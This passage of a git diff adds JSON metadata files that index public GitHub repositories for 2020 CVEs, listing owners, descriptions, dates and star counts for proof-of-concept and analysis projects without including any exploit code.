"topics": [], + "visibility": "public", + "forks": 16, + "watchers": 73, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 242452403, + "name": "FastJson1.2.62-RCE", + "full_name": "Wfzsec\/FastJson1.2.62-RCE", + "owner": { + "login": "Wfzsec", + "id": 24896161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24896161?v=4", + "html_url": "https:\/\/github.com\/Wfzsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wfzsec\/FastJson1.2.62-RCE", + "description": "来源于jackson-CVE-2020-8840,需要开autotype", + "fork": false, + "created_at": "2020-02-23T03:51:40Z", + "updated_at": "2024-08-12T19:58:00Z", + "pushed_at": "2022-06-17T02:58:03Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 242675357, + "name": "CVE-2020-8840", + "full_name": "fairyming\/CVE-2020-8840", + "owner": { + "login": "fairyming", + "id": 44915879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44915879?v=4", + "html_url": "https:\/\/github.com\/fairyming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fairyming\/CVE-2020-8840", + "description": "CVE-2020-8840:FasterXML\/jackson-databind 远程代码执行漏洞", + "fork": false, + "created_at": "2020-02-24T07:43:12Z", + "updated_at": "2024-08-12T19:58:03Z", + "pushed_at": "2020-02-24T07:45:37Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 269508362, + "name": "CVE-2020-8840", + "full_name": "Blyth0He\/CVE-2020-8840", + "owner": { + "login": "Blyth0He", + "id": 12743647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12743647?v=4", + "html_url": "https:\/\/github.com\/Blyth0He", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Blyth0He\/CVE-2020-8840", + "description": "jackson jndi injection", + "fork": false, + "created_at": "2020-06-05T02:05:15Z", + "updated_at": "2023-08-11T14:19:18Z", + "pushed_at": "2020-06-05T02:23:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 311900305, + "name": "CVE-2020-8840", + "full_name": "Veraxy00\/CVE-2020-8840", + "owner": { + "login": "Veraxy00", + "id": 29369876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29369876?v=4", + "html_url": "https:\/\/github.com\/Veraxy00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Veraxy00\/CVE-2020-8840", + "description": "Jackson-databind远程代码执行漏洞(CVE-2020-8840)分析复现环境代码", + "fork": false, + "created_at": "2020-11-11T07:53:21Z", + "updated_at": "2024-06-18T13:58:29Z", + "pushed_at": "2020-12-28T13:18:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 333189009, + "name": "CVE-2020-8840", + "full_name": "dpredrag\/CVE-2020-8840", + "owner": { + "login": "dpredrag", + "id": 3372646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3372646?v=4", + "html_url": "https:\/\/github.com\/dpredrag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpredrag\/CVE-2020-8840", + "description": null, + "fork": false, + "created_at": "2021-01-26T19:10:22Z", + "updated_at": "2023-08-11T13:51:38Z", + "pushed_at": "2021-01-26T19:29:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-8888.json b/2020/CVE-2020-8888.json new file mode 100644 index 0000000000..d946338181 --- /dev/null +++ b/2020/CVE-2020-8888.json @@ -0,0 +1,33 @@ +[ + { + "id": 271691839, + "name": "CVE-2020-8888", + "full_name": "SnipJoe\/CVE-2020-8888", + "owner": { + "login": "SnipJoe", + "id": 48639239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48639239?v=4", + "html_url": "https:\/\/github.com\/SnipJoe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SnipJoe\/CVE-2020-8888", + "description": "test", + "fork": false, + "created_at": "2020-06-12T02:37:26Z", + "updated_at": "2020-06-12T02:37:30Z", + "pushed_at": "2020-06-12T02:37:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-8950.json b/2020/CVE-2020-8950.json new file mode 100644 index 0000000000..fcf2ff2dc9 --- /dev/null +++ b/2020/CVE-2020-8950.json @@ -0,0 +1,37 @@ +[ + { + "id": 238995989, + "name": "amd_eop_poc", + "full_name": "sailay1996\/amd_eop_poc", + "owner": { + "login": "sailay1996", + "id": 16739401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16739401?v=4", + "html_url": "https:\/\/github.com\/sailay1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sailay1996\/amd_eop_poc", + "description": "CVE-2020-8950 AMD User Experience Program Launcher from Radeon Software Privilege Escalation ( FileWrite eop) ", + "fork": false, + "created_at": "2020-02-07T18:22:51Z", + "updated_at": "2024-08-12T19:57:28Z", + "pushed_at": "2020-04-23T07:01:59Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "amd-privilege-escalation", + "privilege-escalation", + "windows-exploitation" + ], + "visibility": "public", + "forks": 6, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-8958.json b/2020/CVE-2020-8958.json new file mode 100644 index 0000000000..749afb2efc --- /dev/null +++ b/2020/CVE-2020-8958.json @@ -0,0 +1,71 @@ +[ + { + "id": 279807177, + "name": "CVE-2020-8958", + "full_name": "qurbat\/CVE-2020-8958", + "owner": { + "login": "qurbat", + "id": 37518297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37518297?v=4", + "html_url": "https:\/\/github.com\/qurbat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qurbat\/CVE-2020-8958", + "description": "Proof of concept for arbitrary OS command execution on Guangzhou\/V-SOL 1GE ONU devices (CVE-2020-8958)", + "fork": false, + "created_at": "2020-07-15T08:10:01Z", + "updated_at": "2024-08-07T05:41:50Z", + "pushed_at": "2021-04-13T20:04:38Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "gpon" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 362168700, + "name": "CVE-2020-8958", + "full_name": "Asjidkalam\/CVE-2020-8958", + "owner": { + "login": "Asjidkalam", + "id": 16708391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16708391?v=4", + "html_url": "https:\/\/github.com\/Asjidkalam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Asjidkalam\/CVE-2020-8958", + "description": "CVE-2020-8958: Authenticated RCE exploit for NetLink HG323", + "fork": false, + "created_at": "2021-04-27T15:51:08Z", + "updated_at": "2023-12-17T13:59:13Z", + "pushed_at": "2021-04-28T16:27:01Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "exploit", + "router", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9006.json b/2020/CVE-2020-9006.json new file mode 100644 index 0000000000..ad9f1bad0c --- /dev/null +++ b/2020/CVE-2020-9006.json @@ -0,0 +1,33 @@ +[ + { + "id": 281305774, + "name": "cve-2020-9006", + "full_name": "s3rgeym\/cve-2020-9006", + "owner": { + "login": "s3rgeym", + "id": 12753171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12753171?v=4", + "html_url": "https:\/\/github.com\/s3rgeym", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3rgeym\/cve-2020-9006", + "description": null, + "fork": false, + "created_at": "2020-07-21T05:39:58Z", + "updated_at": "2022-08-26T23:25:52Z", + "pushed_at": "2022-08-26T23:55:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9008.json b/2020/CVE-2020-9008.json new file mode 100644 index 0000000000..daa78d790c --- /dev/null +++ b/2020/CVE-2020-9008.json @@ -0,0 +1,33 @@ +[ + { + "id": 240986945, + "name": "blackboard-xss", + "full_name": "kyletimmermans\/blackboard-xss", + "owner": { + "login": "kyletimmermans", + "id": 47165102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47165102?v=4", + "html_url": "https:\/\/github.com\/kyletimmermans", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kyletimmermans\/blackboard-xss", + "description": "Information regarding CVE-2020-9008", + "fork": false, + "created_at": "2020-02-17T00:07:34Z", + "updated_at": "2024-08-12T19:57:48Z", + "pushed_at": "2021-09-11T21:08:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9038.json b/2020/CVE-2020-9038.json new file mode 100644 index 0000000000..3d285950ba --- /dev/null +++ b/2020/CVE-2020-9038.json @@ -0,0 +1,33 @@ +[ + { + "id": 243498604, + "name": "CVE-2020-9038", + "full_name": "JavierOlmedo\/CVE-2020-9038", + "owner": { + "login": "JavierOlmedo", + "id": 15904748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904748?v=4", + "html_url": "https:\/\/github.com\/JavierOlmedo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JavierOlmedo\/CVE-2020-9038", + "description": "Disclosure report of CVE-2020-9038", + "fork": false, + "created_at": "2020-02-27T11:02:16Z", + "updated_at": "2024-08-12T19:58:10Z", + "pushed_at": "2020-02-27T11:38:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9047.json b/2020/CVE-2020-9047.json new file mode 100644 index 0000000000..3275a23af1 --- /dev/null +++ b/2020/CVE-2020-9047.json @@ -0,0 +1,33 @@ +[ + { + "id": 279328764, + "name": "CVE-2020-9047", + "full_name": "norrismw\/CVE-2020-9047", + "owner": { + "login": "norrismw", + "id": 42365063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42365063?v=4", + "html_url": "https:\/\/github.com\/norrismw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/norrismw\/CVE-2020-9047", + "description": null, + "fork": false, + "created_at": "2020-07-13T14:40:34Z", + "updated_at": "2023-11-15T21:37:34Z", + "pushed_at": "2020-07-13T14:47:02Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9054.json b/2020/CVE-2020-9054.json new file mode 100644 index 0000000000..ef866065d7 --- /dev/null +++ b/2020/CVE-2020-9054.json @@ -0,0 +1,33 @@ +[ + { + "id": 404790387, + "name": "CVE-2020-9054", + "full_name": "darrenmartyn\/CVE-2020-9054", + "owner": { + "login": "darrenmartyn", + "id": 49643587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49643587?v=4", + "html_url": "https:\/\/github.com\/darrenmartyn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darrenmartyn\/CVE-2020-9054", + "description": "CVE-2020-9054 PoC for Zyxel", + "fork": false, + "created_at": "2021-09-09T16:16:34Z", + "updated_at": "2023-10-08T23:35:13Z", + "pushed_at": "2021-09-09T16:18:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9273.json b/2020/CVE-2020-9273.json new file mode 100644 index 0000000000..4b8c387069 --- /dev/null +++ b/2020/CVE-2020-9273.json @@ -0,0 +1,33 @@ +[ + { + "id": 310408864, + "name": "CVE-2020-9273", + "full_name": "ptef\/CVE-2020-9273", + "owner": { + "login": "ptef", + "id": 8737680, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8737680?v=4", + "html_url": "https:\/\/github.com\/ptef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ptef\/CVE-2020-9273", + "description": "Analysis and exploitation of an use-after-free in ProFTPd", + "fork": false, + "created_at": "2020-11-05T20:22:40Z", + "updated_at": "2024-08-12T20:07:24Z", + "pushed_at": "2023-06-21T10:58:35Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9283.json b/2020/CVE-2020-9283.json new file mode 100644 index 0000000000..9711747a29 --- /dev/null +++ b/2020/CVE-2020-9283.json @@ -0,0 +1,41 @@ +[ + { + "id": 268776123, + "name": "CVE-2020-9283", + "full_name": "brompwnie\/CVE-2020-9283", + "owner": { + "login": "brompwnie", + "id": 8638589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8638589?v=4", + "html_url": "https:\/\/github.com\/brompwnie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brompwnie\/CVE-2020-9283", + "description": "Exploit for CVE-2020-9283 based on Go ", + "fork": false, + "created_at": "2020-06-02T10:55:37Z", + "updated_at": "2024-11-14T10:12:19Z", + "pushed_at": "2020-06-08T13:16:06Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "crypto", + "cve-2020-9283", + "exploit", + "go", + "poc", + "ssh", + "tool" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9289.json b/2020/CVE-2020-9289.json new file mode 100644 index 0000000000..692225fef5 --- /dev/null +++ b/2020/CVE-2020-9289.json @@ -0,0 +1,33 @@ +[ + { + "id": 660545507, + "name": "CVE-2020-9289", + "full_name": "synacktiv\/CVE-2020-9289", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2020-9289", + "description": "Decrypt reversible secrets encrypted using the default hardcoded key related to CVE-2020-9289 on FortiAnalyzer\/FortiManager (the only difference with CVE-2019-6693 is the encryption routine).", + "fork": false, + "created_at": "2023-06-30T08:48:37Z", + "updated_at": "2024-08-14T17:14:37Z", + "pushed_at": "2023-06-30T08:55:57Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9332.json b/2020/CVE-2020-9332.json new file mode 100644 index 0000000000..a70365771a --- /dev/null +++ b/2020/CVE-2020-9332.json @@ -0,0 +1,33 @@ +[ + { + "id": 261396094, + "name": "CVE-2020-9332", + "full_name": "Sentinel-One\/CVE-2020-9332", + "owner": { + "login": "Sentinel-One", + "id": 8438799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8438799?v=4", + "html_url": "https:\/\/github.com\/Sentinel-One", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sentinel-One\/CVE-2020-9332", + "description": null, + "fork": false, + "created_at": "2020-05-05T08:06:05Z", + "updated_at": "2022-01-31T04:01:09Z", + "pushed_at": "2020-06-17T16:23:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9375.json b/2020/CVE-2020-9375.json new file mode 100644 index 0000000000..d5ebbd62ee --- /dev/null +++ b/2020/CVE-2020-9375.json @@ -0,0 +1,39 @@ +[ + { + "id": 250056587, + "name": "cve-2020-9375", + "full_name": "thewhiteh4t\/cve-2020-9375", + "owner": { + "login": "thewhiteh4t", + "id": 36354846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36354846?v=4", + "html_url": "https:\/\/github.com\/thewhiteh4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thewhiteh4t\/cve-2020-9375", + "description": "TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allows remote attackers to cause a denial of service via a crafted HTTP Header containing an unexpected Referer field.", + "fork": false, + "created_at": "2020-03-25T18:18:15Z", + "updated_at": "2024-11-24T20:36:30Z", + "pushed_at": "2020-03-29T20:32:16Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-9375", + "exploit", + "tp-link", + "tplink" + ], + "visibility": "public", + "forks": 7, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9376.json b/2020/CVE-2020-9376.json new file mode 100644 index 0000000000..06b230a6a9 --- /dev/null +++ b/2020/CVE-2020-9376.json @@ -0,0 +1,38 @@ +[ + { + "id": 278486856, + "name": "dlink-dir610-exploits", + "full_name": "renatoalencar\/dlink-dir610-exploits", + "owner": { + "login": "renatoalencar", + "id": 6964593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6964593?v=4", + "html_url": "https:\/\/github.com\/renatoalencar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renatoalencar\/dlink-dir610-exploits", + "description": "Exploits for CVE-2020-9376 and CVE-2020-9377", + "fork": false, + "created_at": "2020-07-09T22:48:51Z", + "updated_at": "2024-09-06T13:16:51Z", + "pushed_at": "2020-07-09T22:49:10Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "dlink", + "exploit", + "remote-code-execution" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9380.json b/2020/CVE-2020-9380.json new file mode 100644 index 0000000000..50789e9c70 --- /dev/null +++ b/2020/CVE-2020-9380.json @@ -0,0 +1,33 @@ +[ + { + "id": 241514668, + "name": "CVE-2020-9380", + "full_name": "migueltarga\/CVE-2020-9380", + "owner": { + "login": "migueltarga", + "id": 1177629, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1177629?v=4", + "html_url": "https:\/\/github.com\/migueltarga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/migueltarga\/CVE-2020-9380", + "description": "https:\/\/medium.com\/@anderson_pablo\/iptv-smarters-exploit-cve-2020-9380-22d4b21f5da7", + "fork": false, + "created_at": "2020-02-19T02:29:14Z", + "updated_at": "2024-08-12T19:57:53Z", + "pushed_at": "2023-05-17T20:14:01Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 13, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9442.json b/2020/CVE-2020-9442.json new file mode 100644 index 0000000000..8db6807a0f --- /dev/null +++ b/2020/CVE-2020-9442.json @@ -0,0 +1,33 @@ +[ + { + "id": 243652977, + "name": "CVE-2020-9442", + "full_name": "hessandrew\/CVE-2020-9442", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2020-9442", + "description": "OpenVPN Connect for Windows (MSI) - 3.1.0.361 - Privilege Escalation", + "fork": false, + "created_at": "2020-02-28T01:27:08Z", + "updated_at": "2024-08-12T19:58:11Z", + "pushed_at": "2020-02-28T02:22:03Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9460.json b/2020/CVE-2020-9460.json new file mode 100644 index 0000000000..0a5254fe7d --- /dev/null +++ b/2020/CVE-2020-9460.json @@ -0,0 +1,33 @@ +[ + { + "id": 245220968, + "name": "CVE-2020-9460", + "full_name": "g-rubert\/CVE-2020-9460", + "owner": { + "login": "g-rubert", + "id": 40837605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40837605?v=4", + "html_url": "https:\/\/github.com\/g-rubert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-rubert\/CVE-2020-9460", + "description": "Stored Cross Site Scripting - Oempro ", + "fork": false, + "created_at": "2020-03-05T17:03:03Z", + "updated_at": "2024-08-12T19:58:24Z", + "pushed_at": "2020-09-09T17:54:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9461.json b/2020/CVE-2020-9461.json new file mode 100644 index 0000000000..7c426bc6f8 --- /dev/null +++ b/2020/CVE-2020-9461.json @@ -0,0 +1,33 @@ +[ + { + "id": 245221085, + "name": "CVE-2020-9461", + "full_name": "g-rubert\/CVE-2020-9461", + "owner": { + "login": "g-rubert", + "id": 40837605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40837605?v=4", + "html_url": "https:\/\/github.com\/g-rubert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-rubert\/CVE-2020-9461", + "description": "Stored Cross Site Scripting - Oempro ", + "fork": false, + "created_at": "2020-03-05T17:03:25Z", + "updated_at": "2024-08-12T19:58:24Z", + "pushed_at": "2020-09-09T17:52:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9470.json b/2020/CVE-2020-9470.json new file mode 100644 index 0000000000..b6a146f28c --- /dev/null +++ b/2020/CVE-2020-9470.json @@ -0,0 +1,35 @@ +[ + { + "id": 324267729, + "name": "CVE-2020-9470", + "full_name": "Al1ex\/CVE-2020-9470", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-9470", + "description": "Wing FTP Server 6.2.5 - Privilege Escalation", + "fork": false, + "created_at": "2020-12-25T01:53:45Z", + "updated_at": "2024-08-12T20:08:50Z", + "pushed_at": "2020-12-25T01:54:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-9470" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9472.json b/2020/CVE-2020-9472.json new file mode 100644 index 0000000000..d61d80a0f2 --- /dev/null +++ b/2020/CVE-2020-9472.json @@ -0,0 +1,33 @@ +[ + { + "id": 356180975, + "name": "CVE-2020-9472", + "full_name": "john-dooe\/CVE-2020-9472", + "owner": { + "login": "john-dooe", + "id": 65825969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65825969?v=4", + "html_url": "https:\/\/github.com\/john-dooe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/john-dooe\/CVE-2020-9472", + "description": "CVE-2020-9472 构造文件", + "fork": false, + "created_at": "2021-04-09T07:39:31Z", + "updated_at": "2021-04-17T08:17:49Z", + "pushed_at": "2021-04-17T08:17:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9480.json b/2020/CVE-2020-9480.json new file mode 100644 index 0000000000..0350604f7f --- /dev/null +++ b/2020/CVE-2020-9480.json @@ -0,0 +1,33 @@ +[ + { + "id": 833490634, + "name": "CVE-2020-9480", + "full_name": "XiaoShaYu617\/CVE-2020-9480", + "owner": { + "login": "XiaoShaYu617", + "id": 148698011, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148698011?v=4", + "html_url": "https:\/\/github.com\/XiaoShaYu617", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaoShaYu617\/CVE-2020-9480", + "description": null, + "fork": false, + "created_at": "2024-07-25T06:55:59Z", + "updated_at": "2024-07-25T12:02:16Z", + "pushed_at": "2024-07-25T12:02:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9483.json b/2020/CVE-2020-9483.json new file mode 100644 index 0000000000..82a65f75aa --- /dev/null +++ b/2020/CVE-2020-9483.json @@ -0,0 +1,64 @@ +[ + { + "id": 327318338, + "name": "apache_skywalking", + "full_name": "shanika04\/apache_skywalking", + "owner": { + "login": "shanika04", + "id": 73774345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4", + "html_url": "https:\/\/github.com\/shanika04", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanika04\/apache_skywalking", + "description": "CVE-2020-9483 OR CVE-2020-13921", + "fork": false, + "created_at": "2021-01-06T13:22:32Z", + "updated_at": "2021-03-22T05:21:36Z", + "pushed_at": "2021-01-06T13:52:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 387366849, + "name": "CVE-2020-9483", + "full_name": "Neko-chanQwQ\/CVE-2020-9483", + "owner": { + "login": "Neko-chanQwQ", + "id": 83222283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83222283?v=4", + "html_url": "https:\/\/github.com\/Neko-chanQwQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Neko-chanQwQ\/CVE-2020-9483", + "description": "PoC of SQL Injection vul(CVE-2020-9483,Apache 